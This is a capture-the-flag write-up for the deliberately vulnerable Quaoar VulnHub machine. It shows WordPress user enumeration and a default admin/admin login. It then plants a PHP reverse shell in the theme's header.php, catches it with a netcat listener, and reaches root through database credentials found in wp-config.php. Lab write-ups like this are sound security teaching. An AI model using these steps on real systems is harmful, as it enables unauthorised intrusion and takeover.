Quaoar

This is my writeup for the Quaoar VM from vulnhub.com. This machine is intended to be doable by someone who is interested in learning computer security There are 3 flags on this machine

  1. Get a shell
  2. Get root access
  3. There is a post exploitation flag on the box

Intelligence Gathering

Let's start scanning:

I run my own recon script, which contains nmap and nikto:

Recon

Interesting stuff is

  • Open ports:
    • 22/tcp
    • 53/tcp
    • 80/tcp
    • 110/tcp
    • 139/tcp
    • 143/tcp
    • 445/tcp
    • 993/tcp
    • 995/tcp
    • 53/udp
    • 137/udp
    • 5353/udp
  • PHP 5.3.10-1ubuntu3
  • /wordpress/
  • Apache/2.2.22
  • Apache mod_negotiation is enabled

Wordpress

With WPScan I identified the following two user
ruby wpscan –url __HOST__ –enumerate u

  • admin
  • wpuser

Let's try some standard passwords. Oops, admin/admin actually worked.
I did not expect this to work.

Exploitation

Placing a reverse shell

I did the same thing as for the Mr Robot 1 VM. I logged into wordpress and put an edited version of the php rev_shell into header.php

I then started a listener on port 42 on my local machine.

nc -lvp 42

Then I kicked the reverse shell:
curl http://__IP__/wordpress/wp-content/themes/twentyfourteen/header.php

Let's wait for reverse shell to connect:

Reverse shell

Fiddle around and read the the first flag

$ cat /home/wpadmin/flag.txt
2bafe61f03117ac66a73c3c514de796e

If we check for crons we can find the second flag:

$ cat /etc/cron.d/php5
# /etc/cron.d/php5: crontab fragment for php5
#  This purges session files older than X, where X is defined in seconds
#  as the largest value of session.gc_maxlifetime from all your php.ini
#  files, or 24 minutes if not defined.  See /usr/lib/php5/maxlifetime
# Its always a good idea to check for crontab to learn more about the operating system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de
# Look for and purge old sessions every 30 minutes
09,39 *     * * *     root   [ -x /usr/lib/php5/maxlifetime ] && [ -d /var/lib/php5 ] && find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin +$(/usr/lib/php5/maxlifetime) ! -execdir fuser -s {} 2>/dev/null \; -delete

Getting root

After grabbing the second flag, I thought about checking the webroot. While reading the files something strange popped up:

$ cat /var/www/wordpress/wp-config.php

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

This looks like the root credentials. And indeed, they worked.

Additionally the final flag 8e3f9ec016e3598c5eec11fd3d73f6fb lays there.

ssh [email protected]__IP__

Root

Learnings

I reorganized my stuff. My first intention was to save scripts per VM. With this I realized, I can reuse the php reverse shell from the Mr Robot 1 VM and the recon script as well, so I now have a folder called shared where my general scripts lay.

vulnhub writeup spoiler oscp